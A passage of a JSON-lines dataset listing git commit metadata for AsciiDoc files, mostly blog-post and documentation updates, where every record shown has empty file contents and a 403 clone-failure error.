dataset\n","repos":"korczis\/gooddata-ruby-examples,korczis\/gooddata-ruby-examples","old_file":"04_model\/counting_number_of_lines.asciidoc","new_file":"04_model\/counting_number_of_lines.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/korczis\/gooddata-ruby-examples.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"91ec1ec3a3b037d7245b7449473981ac5eb51404","subject":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","message":"Update 2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","repos":"andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io,andreassiegelrfid\/hubpress.io","old_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_file":"_posts\/2017-05-26-Getting-started-with-Terraform-AWS-Docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/andreassiegelrfid\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7cf420e0732a7f27c80c5bb652197a9e3b9f375c","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aebfd7781e860e94d4031e30581460808d54c79c","subject":"Update 2011-02-18-I-remember-thinking.adoc","message":"Update 2011-02-18-I-remember-thinking.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2011-02-18-I-remember-thinking.adoc","new_file":"_posts\/2011-02-18-I-remember-thinking.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e01e85a6808c68a5766784a6955e277aed6bb23","subject":"Update 2016-05-23-Models-are-pointers.adoc","message":"Update 2016-05-23-Models-are-pointers.adoc","repos":"topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io,topicusonderwijs\/topicusonderwijs.github.io","old_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_file":"_posts\/2016-05-23-Models-are-pointers.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/topicusonderwijs\/topicusonderwijs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6ac0ca08a2ac06d8dad97e30896dbf16b0348e71","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 
2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e2bae1b29eba2ff72cec61fd80e9959caa7562a","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34f64cfa3cdf582050d401262ca5f9b27e129826","subject":"Update 2017-07-17-just-doin-some-stuff.adoc","message":"Update 2017-07-17-just-doin-some-stuff.adoc","repos":"iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site,iwakuralai-n\/badgame-site","old_file":"_posts\/2017-07-17-just-doin-some-stuff.adoc","new_file":"_posts\/2017-07-17-just-doin-some-stuff.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iwakuralai-n\/badgame-site.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01fb544d28437406b7fb914b11c3c2d270d44eee","subject":"CL note: getting current file","message":"CL note: getting current file\n","repos":"cmpitg\/programming-language-notes","old_file":"Common-Lisp.adoc","new_file":"Common-Lisp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cmpitg\/programming-language-notes.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"5c360c7d417c27c72db29cb3d3427fa5cfa8fb1c","subject":"Update 2016-01-12-.adoc","message":"Update 2016-01-12-.adoc","repos":"Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io,Lh4cKg\/Lh4cKg.github.io","old_file":"_posts\/2016-01-12-.adoc","new_file":"_posts\/2016-01-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Lh4cKg\/Lh4cKg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b766e0a5b058064a2fd962ec13641b85658b21fe","subject":"Update 2017-07-28-.adoc","message":"Update 2017-07-28-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-28-.adoc","new_file":"_posts\/2017-07-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"73a213c87b2b44d3a97353c097d2cdf11fbda968","subject":"Update 2017-11-12-.adoc","message":"Update 
2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cbcddab9c9b03140d944d701f78fd8f21c3e117b","subject":"Update 2017-11-19-.adoc","message":"Update 2017-11-19-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-19-.adoc","new_file":"_posts\/2017-11-19-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03d315f5b796a07907c322b6964949b5e2d22d72","subject":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","message":"Update 2018-11-27-Laravel-Nexmo-S-M-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_file":"_posts\/2018-11-27-Laravel-Nexmo-S-M-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0c616b0e9026362700a0c055b210ca0a1275d84","subject":"Update 2019-02-14-Google-Spread-Sheet.adoc","message":"Update 2019-02-14-Google-Spread-Sheet.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_file":"_posts\/2019-02-14-Google-Spread-Sheet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d74851bc755a40be091a5d004f850ed3a4843e9c","subject":"Deading branching3","message":"Deading branching3\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Git\/Git branching 3.adoc","new_file":"Git\/Git branching 3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"79e09156f625043ccc6655157186807ef918f01a","subject":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","message":"Update 2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_file":"_posts\/2017-06-23-Making-Bot-with-Raspberry-Pi-and-Phatom-J-S.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1501e84e279617e04980dfa023ab0010a196ac6","subject":"making the link relative","message":"making the link relative\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_file":"developer-tools\/java\/chapters\/ch08-aws.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"978d1ed2575d622cb5055f6fa7fbe845ce58572c","subject":"[Docs] Improve tuning for speed advice (#33315)","message":"[Docs] Improve tuning for speed advice (#33315)\n\nThis change merges two sections in the \"Tune for search speed\" documentation\r\nthat recommend mapping numeric identifiers as keywords. Both sections contain\r\nmostly the same advice, so they can be merged.\r\n\r\nCloses #32733","repos":"robin13\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,HonzaKral\/elasticsearch,robin13\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,GlenRSmith\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/how-to\/search-speed.asciidoc","new_file":"docs\/reference\/how-to\/search-speed.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b5d493c96eb8e168e05180a82cdef72a485d8f2a","subject":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","message":"Update 2015-02-19-Manual-de-Git-En-Espanol.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_file":"_posts\/2015-02-19-Manual-de-Git-En-Espanol.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"94e41924f3f46a3de5dca274d03c868a992ac66d","subject":"Update 2014-09-17-We-need-a-new-filter.adoc","message":"Update 
2014-09-17-We-need-a-new-filter.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-17-We-need-a-new-filter.adoc","new_file":"_posts\/2014-09-17-We-need-a-new-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6fda2970e3420d85ae9b848a76942597baa5ad3c","subject":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","message":"Update 2015-06-05-Es-ist-die-Donutwelt.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_file":"_posts\/2015-06-05-Es-ist-die-Donutwelt.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e821099d7754de70811d5b5369f21d014bd2b831","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b818588aa7a630f259b02a9d2c583b582832ffb2","subject":"Update 2017-09-26-zapier-Google-Trello.adoc","message":"Update 2017-09-26-zapier-Google-Trello.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_file":"_posts\/2017-09-26-zapier-Google-Trello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"dced3ac1041136d70739418c8ea537a549553231","subject":"Update 2015-02-24-Test-image.adoc","message":"Update 2015-02-24-Test-image.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2015-02-24-Test-image.adoc","new_file":"_posts\/2015-02-24-Test-image.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3e4deb92760a8522136ae1188173b98e05fb34da","subject":"Update 2017-02-11-Drawatchio.adoc","message":"Update 2017-02-11-Drawatchio.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-11-Drawatchio.adoc","new_file":"_posts\/2017-02-11-Drawatchio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ca9bfa1764f50adafb0cae9308212e3447978b0c","subject":"Update 2016-05-13-Sub.adoc","message":"Update 2016-05-13-Sub.adoc","repos":"tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io,tongqqiu\/tongqqiu.github.io","old_file":"_posts\/2016-05-13-Sub.adoc","new_file":"_posts\/2016-05-13-Sub.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tongqqiu\/tongqqiu.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7f6e2ad07025cc18eba19afa3bbacd2b7242da0","subject":"Update 2017-01-13-vue.adoc","message":"Update 2017-01-13-vue.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-vue.adoc","new_file":"_posts\/2017-01-13-vue.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6c367b4626257af3d9cfffaa67ece0bbe3737997","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e8ce081d5ca76614aee2ed883cc58c84e005d2f","subject":"Initial revision of the HttpsMonitor monitor.","message":"Initial revision of the HttpsMonitor monitor.\n\nCyrille\n","repos":"roskens\/opennms-pre-github,tdefilip\/opennms,tdefilip\/opennms,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,aihua\/opennms,tdefilip\/opennms,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,aihua\/opennms,tdefilip\/opennms,rdkgit\/opennms,rdkgit\/opennms,tdefilip\/opennms,rdkgit\/opennms,tdefilip\/opennms,aihua\/opennms,aihua\/opennms,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,tdefilip\/opennms,roskens\/opennms-pre-github,roskens\/opennms-pre-github,roskens\/opennms-pre-github,aihua\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,rdkgit\/opennms,rdkgit\/opennms,roskens\/opennms-pre-github,aihua\/opennms,aihua\/opennms","old_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpsMonitor.adoc","new_file":"opennms-doc\/guide-admin\/src\/asciidoc\/text\/poller\/HttpsMonitor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rdkgit\/opennms.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"3749b635bea4107bf391e6761be0adbeabbb3f72","subject":"Publish 2016-7-8.adoc","message":"Publish 
2016-7-8.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-8.adoc","new_file":"2016-7-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88573c01df6ac553b881848e1019152b74c66500","subject":"Update 2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","message":"Update 2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","repos":"gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io,gjagush\/gjagush.github.io","old_file":"_posts\/2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","new_file":"_posts\/2017-10-11-Changing-Masonry-in-a-Changing-World.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gjagush\/gjagush.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7004c48cf99ee443ab70111b8f5c7a5ccedd41b0","subject":"Resource Developer's Guide","message":"Resource Developer's Guide\n","repos":"liveoak-io\/liveoak.io,liveoak-io\/liveoak.io,liveoak-io\/liveoak.io","old_file":"docs\/guides\/resource_developers_guide.adoc","new_file":"docs\/guides\/resource_developers_guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liveoak-io\/liveoak.io.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d451ae0ab753d0404520d32706019fff78167c00","subject":"Guide for enabling HTTPS\/TLS (#9536)","message":"Guide for enabling HTTPS\/TLS (#9536)\n\nInitial version of the guide for enabling TLS\/HTTPS for Quarkus based Keycloak\r\n\r\nCloses #9458","repos":"ahus1\/keycloak,stianst\/keycloak,ahus1\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,keycloak\/keycloak,keycloak\/keycloak,ahus1\/keycloak,srose\/keycloak,raehalme\/keycloak,stianst\/keycloak,raehalme\/keycloak,jpkrohling\/keycloak,jpkrohling\/keycloak,abstractj\/keycloak,raehalme\/keycloak,keycloak\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak,reneploetz\/keycloak,hmlnarik\/keycloak,srose\/keycloak,reneploetz\/keycloak,thomasdarimont\/keycloak,stianst\/keycloak,stianst\/keycloak,hmlnarik\/keycloak,abstractj\/keycloak,jpkrohling\/keycloak,srose\/keycloak,thomasdarimont\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,thomasdarimont\/keycloak,reneploetz\/keycloak,raehalme\/keycloak,mhajas\/keycloak,srose\/keycloak,mhajas\/keycloak,keycloak\/keycloak,mhajas\/keycloak,jpkrohling\/keycloak,keycloak\/keycloak,thomasdarimont\/keycloak,raehalme\/keycloak,mhajas\/keycloak,raehalme\/keycloak,stianst\/keycloak,srose\/keycloak,hmlnarik\/keycloak,reneploetz\/keycloak,ahus1\/keycloak,hmlnarik\/keycloak,ahus1\/keycloak,mhajas\/keycloak,hmlnarik\/keycloak,thomasdarimont\/keycloak,abstractj\/keycloak","old_file":"docs\/guides\/src\/main\/server\/enabletls.adoc","new_file":"docs\/guides\/src\/main\/server\/enabletls.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahus1\/keycloak.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"638a94e526a1778a76cdc00d1c07cf0145dfa16e","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 
2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"28d9f261afad8b0887b5807d696124fe43d8f931","subject":"Struct","message":"Struct\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"JAX-RS client.adoc","new_file":"JAX-RS client.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"152193421e3677f8a3ebd57244a1528a2732cdbc","subject":"y2b create post iPhone 7 - What Apple Doesn't Want You To Know","message":"y2b create post iPhone 7 - What Apple Doesn't Want You To Know","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-18-iPhone-7--What-Apple-Doesnt-Want-You-To-Know.adoc","new_file":"_posts\/2016-10-18-iPhone-7--What-Apple-Doesnt-Want-You-To-Know.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"092cc1fef6357524e398b317705121d00a52eaf9","subject":"Deleted 2018-2-2-Web-R-T-C.adoc","message":"Deleted 2018-2-2-Web-R-T-C.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2018-2-2-Web-R-T-C.adoc","new_file":"2018-2-2-Web-R-T-C.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"131359399b4c7b387ae279c2f3df6175b0af9664","subject":"Create SystemsDesign.adoc","message":"Create SystemsDesign.adoc","repos":"oreillyross\/developer-notes,oreillyross\/developer-notes,oreillyross\/developer-notes","old_file":"SystemsDesign.adoc","new_file":"SystemsDesign.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oreillyross\/developer-notes.git\/': The requested URL returned error: 403\n","license":"artistic-2.0","lang":"AsciiDoc"} {"commit":"405d1da0b1b03216e2ade8d8dcfda9e60a31615a","subject":"Update 2015-07-20-Server-Command.adoc","message":"Update 2015-07-20-Server-Command.adoc","repos":"hanwencheng\/hanwenblog,hanwencheng\/hanwenblog,hanwencheng\/hanwenblog","old_file":"_posts\/2015-07-20-Server-Command.adoc","new_file":"_posts\/2015-07-20-Server-Command.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hanwencheng\/hanwenblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f17c7ee5bf062ee551a01fc485e31d4e74661ce0","subject":"Update 2015-09-19-JSON-in-Python.adoc","message":"Update 
2015-09-19-JSON-in-Python.adoc","repos":"milantracy\/milantracy.github.io,milantracy\/milantracy.github.io,milantracy\/milantracy.github.io","old_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_file":"_posts\/2015-09-19-JSON-in-Python.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/milantracy\/milantracy.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"662b4256655360aa6a95c8af7907f8abf9e0cc56","subject":"Update 2016-11-07-Monday-Workday.adoc","message":"Update 2016-11-07-Monday-Workday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday-Workday.adoc","new_file":"_posts\/2016-11-07-Monday-Workday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1625e279debe70f1a1b5774b6bc0f2ce93389dea","subject":"Update 2017-01-20-Swift-Web-View.adoc","message":"Update 